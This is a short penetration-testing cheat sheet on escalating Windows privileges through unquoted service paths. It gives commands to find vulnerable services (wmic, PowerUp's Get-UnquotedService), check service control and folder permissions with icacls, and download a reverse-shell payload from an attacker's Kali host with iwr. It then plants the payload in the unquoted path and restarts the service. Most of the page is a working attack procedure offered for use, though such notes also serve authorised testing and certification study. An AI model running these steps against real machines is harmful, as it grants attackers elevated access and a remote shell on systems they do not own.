Unquoted Service Paths

1

Get a list of services that is vulnerable to unquoted attack

NOTE: The following command only can run in command prompt

wmic service get name, pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

NOTE: The following command need to import PowerUp.ps1

Get-UnquotedService
2

Check if can start and stop the service

Start-Service <Service Name>
Stop-Service <Service Name>
3

Check user's permission in the respective paths

icacls "<Path>"

EXAMPLE:

icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"
4

Craft a payload that returns reverse shell

5

Download the payload into target machine

iwr -uri http://<Kali IP Address>/<Unquoted Path Name>.exe -Outfile <Unquoted Path Name>.exe
6

Place payload into path

copy <Payload> '<Unquoted Path Name>'

EXAMPLE:

copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
7

Restart the service

Stop-Service <Service Name>
Start-Service <Service Name>
PreviousDLL HijackingNextScheduled Tasks

Last updated